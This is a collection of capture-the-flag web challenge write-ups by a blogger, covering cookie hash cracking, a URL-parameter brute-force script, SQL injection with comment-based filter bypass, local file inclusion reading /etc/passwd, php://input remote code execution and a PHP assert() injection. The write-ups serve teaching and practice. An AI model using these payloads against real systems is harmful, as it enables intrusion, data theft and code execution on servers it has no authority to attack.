[Pragyan CTF] Supreme Leader

Standard

Description:

North Korea reportedly has a bioweapon in the making. Hack into their database and steal it.

Link : http://139.59.62.216/supreme_leader

For the second web challenge we’re given with a URL, lets open it.

Cute Kim 🙂

Now let’d dump the headers of the response using curl:

Megabeets$ curl -D - http://139.59.62.216/supreme_leader/
HTTP/1.1 200 OK
Date: Sun, 05 Mar 2017 08:47:14 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.20
Set-Cookie: KimJongUn=2541d938b0a58946090d7abdde0d3890_b8e2e0e422cae4838fb788c891afb44f; expires=Sun, 05-Mar-2017 08:47:24 GMT; Max-Age=10
Set-Cookie: KimJongUn=TooLateNukesGone; expires=Sun, 05-Mar-2017 08:47:25 GMT; Max-Age=10
Vary: Accept-Encoding
Content-Length: 1117
Content-Type: text/html

 

We can see an interesting cookie:  KimJongUn=2541d938b0a58946090d7abdde0d3890_b8e2e0e422cae4838fb788c891afb44f. The value of the cookie is looking like 2 MD5 hashes combined with “_”. Let’s try to crack them online using my favorite site.

That’s it! Here is the flag: pragyanctf{send_nukes}

[33C3 CTF] pay2win Writeup

Standard

Description:

pay2win – Web
Do you have enough money to buy the flag?

This challenge was pretty tricky to understand at the beginning. I solved it with a quick and simple workaround that allowed me to solve the challenge without fully understand it. Once I got the flag I understood the whole story. So as with all the stories, we need to begin from the start.

We’re given with a website in where we can buy two products: ‘cheap’ (13.37 USD) and ‘flag’ (31337.42 USD). We, of course, want to buy the ‘cheap’ one because we don’t want to spend our money on some leet flag with the answer to life, the universe and blah blah. So — the ‘cheap’ it is.

pay2win_1

In order to buy the product we need to supply a valid credit card number, there are bunch of examples of valid credit cards online.

pay2win_2

Lets try one of them and see what we get.

pay2win_3

Woo-hoo! We finally bought the ‘cheap’ product and fulfilled our dream.
Kidding. Lets move on and see what will we get when trying to buy the ‘flag’.

pay2win_4

pay2win_5

“failed”? Oh no. The server says that we exceeded the credit card limit. The first thing to come in my mind was to brute force the server with valid CC numbers, but I figured out very fast that this isn’t the right way to the solution. At this time I noticed something interesting about the URLs of the pages: there’s a GET parameter named ‘data’ that some parts of it are the same on every request. Until now I thought it’s always a new hash. I grabbed pencil and paper and started to figure out the patterns and the mutual parts. Okay, okay, I admit – opened VS Code and made a simple table. The mutual parts highlighted using Photoshop.

pay2win_6

As you can see, every hash is combined from 3 parts. The beginning of each type is mutual and so is the end. I thought that certain combination is required to get the flag. But how I mix the parts to the correct hash so as to get the ‘flag’ content. Now it’s about trial and error. Or not.

After two manual tries I gave up because automation is always better and here comes the workaround I mentioned before. I created a list with instance of every colored part and added one example of white part from each page. I then created from this list another list with all possible permutations of 3 parts, i.e all the possible combinatios (990 combinations) and tried all of them using urllib2.urlopen() ’til I found ’33C3′ in the response.

I know. It isn’t the most efficient way to do this but it was short and quick.

import itertools
import urllib2

hash_parts = ['28df361f896eb3c3706cda0474915040',
'5e4ec20070a567e096d3b89ed5a54b1d',
'23b5b0554edda4f8828df361f896eb3c3706cda0474915040',
'4f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f',
'232c66210158dfb23a2eda5cc945a0a9650c1ed0fa0a08f6',
'2f7ef761e2bbe791',
'47aae22e7d77d379272d81aff52de2a5',
'eaa0a3d415f1a595',
'5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8',
'11fca73d28d20f8',
'6e9cc7ab82a57f00']

all_permutations = []

for hash in itertools.permutations(hash_parts, 3):
	all_permutations.append(''.join(hash))
 
for hash in all_permutations:
	try:
		if '33C3' in urllib2.urlopen("http://78.46.224.78:5000/payment/callback?data=%s" % hash).read():
			print 'found:',hash
	except:
		pass

# result:
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c847aae22e7d77d379272d81aff52de2a54f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c847aae22e7d77d379272d81aff52de2a52f7ef761e2bbe791
# found: 5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c86e9cc7ab82a57f004f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f

 

It took the script 2 minutes to run and then it came up with 3 possible hashes, lets try one of them to see if we indeed got the flag:

pay2win_7

YES! We got the flag! I took a deep breath and analysed the matched hashes to find out what is the right pattern. I came out with two possible patterns:

5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8 + X + 2f7ef761e2bbe791
5765679f0870f4309b1a3c83588024d7c146a4104cf9d2c8 + X + 4f75c9736d3b8e0641e7995bb92506da1ac7f8da5a628e19ae39825a916d8a2f
Where X is one of the white parts of ‘flag’ product (purchase page/success).

The logic behind is as followed: Seems like the blue part is for ‘success’ and the light-blue part is for ‘failed’. The yellow part is likely for ‘product page’. If you take every hash of ‘flag’ product (product page / purchase failed) and replace its first part (light-blue / yellow) with the blue part (‘success’) you come up with a valid hash that brings the flag.

That’s it. the flag is:  33C3_3c81d6357a9099a7c091d6c7d71343075e7f8a46d55c593f0ade8f51ac8ae1a8
I’ll be happy to read in the comments how the challenge was for you.

[H4CK1T 2016] QRb00k – Russia Writeup

Standard

Description:

Task: QRb00k – Russia – W3b – 400
The secured messenger was developed in Canada, it’s using systems with qr keys for communicating, it allows to read other people’s messages only to this key holders. But is it true? And you have to figure it out …
http://hack-quest.com

This was a very good web challenge. It took me quite a time to fully understand it but was absolutely worth of its 400 points.

Starting the challenge we are given with a messenger site that uses QR codes to communicate. The site has two main pages:

  • Create – which creates QR code from a given name and message
  • Read – an upload form to upload QR code and read the message inside

So let’s create a message:

We got a QR code which is the key to read our message:

Now let’s read the message using the QR code:

 

Ok, it all worked as it supposed to. I used the zxing service to view the content of the QR code:

h4ck1t_russia_4

Look at the raw text. It’s a short string that looks like it was base64 encoded. But wait, base64 can’t begin with “==”! Those characters usually appear at the end of base64 encoded strings. Is it reversed? Let’s check:

>>> "==QehRXS"[::-1].decode('base64')
'Itay'

Yes! it indeed was reversed. our key (QR code) is created by: QR(Reverse(Base64(name))).

Ok, now that we understand the mechanics we can let the party begin and start playing with SQL Injection. In order to create the QR codes I used this site, It was faster than using the challenge site.

I began with the obvious: ‘ or 1=1–

h4ck1t_russia_5

Whoops, Busted. The system recognized my SQLi attack. I tried some filter bypassing methods and succeeded with this input:

'/*..*/union/*..*/select/*..*/database()/*..*/union/*..*/select/*..*/'Megabeets

Reverse(Base64(input)) == “==wc0VWZiF2Zl10JvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8SKoU2chJWY0FGZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

h4ck1t_russia_6

It worked! now let’s find the correct table (“messages”) and column by using some queries to map the database:

QR(Reverse(Base64(input))) == “zRXZlJWYnVWTn8iKu4iKvQ3YlxWZz9iKu4iKv42bp5WdvoiLuoyLnMXZnF2czVWbn8iKu4iKvU2apx2Lq4iLq8SZtFmbfVGbiFGdvoiLuoyLlJXZod3Lq4iLq8ycu1Wds92YuEWblh2Yz9lbvlGdh1mcvZmbp9iKu4iKv02byZ2Lq4iLq8SKl1WYu9lbtVHbvNGK0F2Yu92YfBXdvJ3ZvoiLuoyL0NWZsV2cvoiLuoyLu9WauV3Lq4iLq8yJ”

'/*..*/union/*..*/select/*..*/group_concat(column_name)/*..*/from/*..*/information_schema.columns/*..*/where/*..*/table_name/*..*/like/*..*/'messages'/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_7

“secret_field”? Sounds suspicious. Let’s query it and see what it contains:

'/*..*/union/*..*/select/*..*/secret_field/*..*/from/*..*/messages/*..*/union/*..*/select/*..*/'Megabeets

h4ck1t_russia_8

And we got the flag! I honestly really enjoyed this challenge.

Flag: h4ck1t{I_h@ck3d_qR_m3Ss@g3r}

 

If you have any questions feel free to ask 🙂

[H4CK1T 2016] Pentest – Mexico Writeup

Standard

Description:

Task: Remote pentest – Mexico – 150 – Web

Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack .Good luck !
http://91.231.84.36:9150/

YAY! Web challenge! If you are following my blog (If not, the subscribe form is on left) you already know how much I love web challenges, It’s either easy points or great puzzle.

Let’s open the website and see what we have:

h4ck1t_mexico1

WOW! JUSTICE LEAGUE! Did I mentioned that I love comic books and especially Batman? Oh, Not yet?

Well, this challenge is going to be awesome. No. It’s already awesome!

OK, deep breath. Let’s start. See that menu on the bottom? Let’s click on some link to see what will happen.

h4ck1t_mexico2

Look at the URL, the “about” page is included by the “index.php” using php commands ‘require’ or ‘include’. When we see something like that in a challenge we can check if the site is vulnerable to LFI attack. In Local File Inclusion attack we can include pages from the local server. Let’s try to include /etc/passwd to check for the existence of the vulnerability

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd

Didn’t work. Let’s try to add null byte at the end

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd%00

h4ck1t_mexico3

It worked! We successfully got the /etc/passwd file. So what now? Let’s try to read the pure php file to see if the flag is in the php pages.

We can use php://filter to print the content of index.php in base64 format. We need to encode the content because we don’t want the php engine to compile the php parts of the code.

http://91.231.84.36:9150/index.php?page=php://filter/convert.base64-encode/resource=index

We got encoding page, now let’s decode it and see if we find a flag . I deleted some content to decrease the size of the code in the post.

<?php
    if ($_GET["page"]) {
    $file = $_GET["page"].".php";
    // simulate null byte issue
    $file = preg_replace('/\x00.*/',"",$file);
        include($file);
    } 
    else
    {
        echo '    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-12">
                <h1>The Big Picture</h1>
                <p>Welcome to the Big Picture. This fantastic digital resource combines the best of formal and informal learning. 
If you are already using The Big Picture, you can register for and access exclusive extra material from this platform. 
This is The Big Picture: have you experienced it yet?  </p> 
            </div>
        </div>';
    }
    //flag{h@h@h@_man_n1ce_try} 

?>
<!DOCTYPE html>
<html class="full" lang="en">
<head>

...
...
...

    </div>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body>

</html>

 

Nope. No flag. The “flag{…}” thing isn’t really the flag because the flag in this CTF should be in h4ck1t{…} format.
Also the other pages like ‘about’ and ‘contact’ is not contain any flag. So we probably need to perform LFI to RCE (Remote Code Execution) attack. We can use the php://input method to send php commands through Post requests. Using Firefox Hackbar plugin we can do it easily.
Put the URL to be http://91.231.84.36:9150/index.php?page=php://input  And the POST data to be

<?  system('ls') ;?>

h4ck1t_mexico4

Success. We got the RCE and we now know about a new secret file. Let’s read it using the same way but this time with

 <?  system('cat file') ;?>

And we got the flag 🙂

Flag: h4ck1t{g00d_rfi_its_y0ur_fl@g}

[CSAW 2016] mfw Writeup

Standard

Description:

Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/

 

Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.

The following table describes the possible respond pages:

URL Result
http://web.chal.csaw.io:8000/?page=home The “home” page is shown.
http://web.chal.csaw.io:8000/?page=about The “about” page is shown.
http://web.chal.csaw.io:8000/?page=contact The “contact” page is shown.
http://web.chal.csaw.io:8000/?page=Megabeets Just a message saying: “That file doesn’t exist!”
http://web.chal.csaw.io:8000/?page=flag An empty page is shown inside the website.
http://web.chal.csaw.io:8000/?page=../../../../etc/passwd Just a message saying: “Detected hacking attempt!”

Looking at the source code i saw the following comment:

<!--<li ><a href="?page=flag">My secrets</a></li> -->

Ok, I need to get the “flag” page but any LFI technique I tried didn’t work. I thought about something else, In the “about” page the creator of the site mentioned that it was built using git. So let’s see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists so I downloaded the repository using DVCS-RIPPER.

You can find index.php here.

So the page is using assert() which is vulnerable to Command Injection attack. After a little trial and error I came up with the answer:

(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content

And received the flag:

string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!

If you try entering the url in a browser, look in the source of the page (CTRL+U), the flag is commented.